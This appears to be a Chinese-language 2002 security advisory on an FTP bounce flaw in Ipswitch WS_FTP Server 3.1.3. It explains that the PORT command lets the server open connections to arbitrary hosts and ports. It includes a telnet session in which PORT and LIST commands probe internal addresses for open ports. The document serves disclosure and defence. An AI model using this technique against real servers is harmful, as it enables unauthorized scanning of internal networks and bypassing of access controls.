IPSwitch WS_FTP Server存在FTP Bounce攻击漏洞发布日期:2002-10-25
更新日期:2002-10-31
受影响系统:
Ipswitch WS FTP Server 3.1.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 6050
Ipswitch WS_FTP Server是一款适用于Microsoft Windows操作系统下的FTP服务程序。
Ipswitch WS_FTP Server设计存在问题,远程攻击者可以利用这个漏洞进行FTP Bounce攻击。
Ipswitch WS_FTP Server由于存在设计问题,用户可以访问FTP服务器发送数据给其他系统。通过使用PORT命令使WS_FTP Server主机连接其他不同主机和端口。这样就允许远程攻击者使FTP服务器对任意IP地址,任意TCP端口发起连接(即使是1024以下的特权端口),通过多次连接可以使攻击者获得内部网络构造,或者连接访问本来被限制的IP地址。
<*来源:Gregory A Lundberg & Jeffrey R. Gerber (lowhalo@hushmail.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=103556238723400&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
内部IP地址"192.168.1.20"监听8080口,而"192.168.2.30"主机'down'或者不能通过8080口访问:
$ telnet x.ternal.ip.address 21
Trying x.ternal.ip.address...
Connected to x.ternal.ip.address.
Escape character is '^]'.
220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696)
220-Sun Jun 04 00:00:00 1989
220-27 days remaining on evaluation.
220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969)
USER lowhalo
331 Password required
PASS el_ach
230 user logged in
PORT 192,168,1,20,31,144
200 command successful
LIST
150 Opening ASCII data connection for directory listing
226 transfer complete
PORT 192,168,2,30,31,144
200 command successful
LIST
425 Can't open data connection.
建议:
--------------------------------------------------------------------------------
厂商补丁:
Ipswitch
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.ipswitch.com/
推荐
评论(0条)
